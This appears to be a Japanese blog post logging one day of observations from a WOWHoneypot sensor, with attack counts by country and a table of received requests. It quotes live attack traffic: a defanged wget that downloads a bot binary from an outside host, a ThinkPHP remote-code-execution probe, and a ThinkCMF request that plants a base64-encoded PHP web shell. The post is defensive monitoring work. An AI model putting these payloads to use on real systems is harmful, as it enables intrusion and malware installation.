WOWHoneypot観察(223日目)
2019/10/25(金)
トータルは6082件でした。
ハンティングログは以下です。
| 49.207.5[.]243 wget+hxxp[:]//107.160.244[.]6/lx/z3hir[.]mpsl |
IPのロケーション別の件数は以下です。
| アメリカ | 4014 |
| ブラジル | 2009 |
| 中国 | 12 |
| インド | 9 |
| オランダ | 8 |
| ドイツ | 3 |
| ポーランド | 3 |
| ウクライナ | 3 |
| イタリア | 3 |
| イラン | 3 |
| トルコ | 2 |
| メキシコ | 2 |
| 日本 | 2 |
| アルゼンチン | 1 |
| シンガポール | 1 |
| ナイジェリア | 1 |
| イラク | 1 |
| スペイン | 1 |
| ロシア | 1 |
| イスラエル | 1 |
| オーストラリア | 1 |
| エジプト | 1 |
| 件数 | 概要 | リクエスト |
|---|---|---|
| 6007 | Tomcat管理ページに対するブルートフォース攻撃 | GET /manager/html |
| 48 | アクセス | GET / |
| 6 | Linksys ルータの E シリーズの脆弱性を狙った通信 | POST /tmUnblock.cgi |
| 3 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php |
| 2 | ThinkPHPの脆弱性を狙った通信 | POST /TP/public/index.php?s=captcha |
| 2 | ThinkPHPの脆弱性を狙った通信 | GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 |
| 2 | Spring Data Commonsの脆弱性を狙った通信 | POST /users?page=&size=5 |
| 2 | DVR/NVR/IPC のAPIにおける脆弱性を狙った通信 | POST /editBlackAndWhiteList |
| 2 | 調査 | HEAD / |
| 2 | phpMyAdminの調査 | GET /admin-scripts.asp |
| 1 | ページ調査 | POST /pagefile.php |
| 1 | DASAN Network Solutionsのホームルーターを狙った通信 | POST /GponForm/diag_Form?images/ |
| 1 | 不明 | GET /servlet?m=mod_listener&p=login&q=loginForm&jumpto=status |
| 1 | ThinkCMFの脆弱性を狙ったと思われる通信? | GET /?a=fetch&templateFile=public/inde&prefix=%27%27&content=%3Cphp%3Efile_put_contents(%27pagefile.php%27,base64_decode('PD9waHAgcHJlZ19yZXBsYWNlKCcvW2Vycm9ycGFnZV0vZScsQHN0cl9yb3QxMygnQG5mZnJlZygkX0NCRkdbY250cl0pOycpLCdzYWZ0Jyk7Pz4='))%3C/php%3E |
| 1 | 不正中継の試み | CONNECT www.google.com:443 |
| 1 | 不正中継の試み | CONNECT www.baidu.com:443 |
にほんブログ村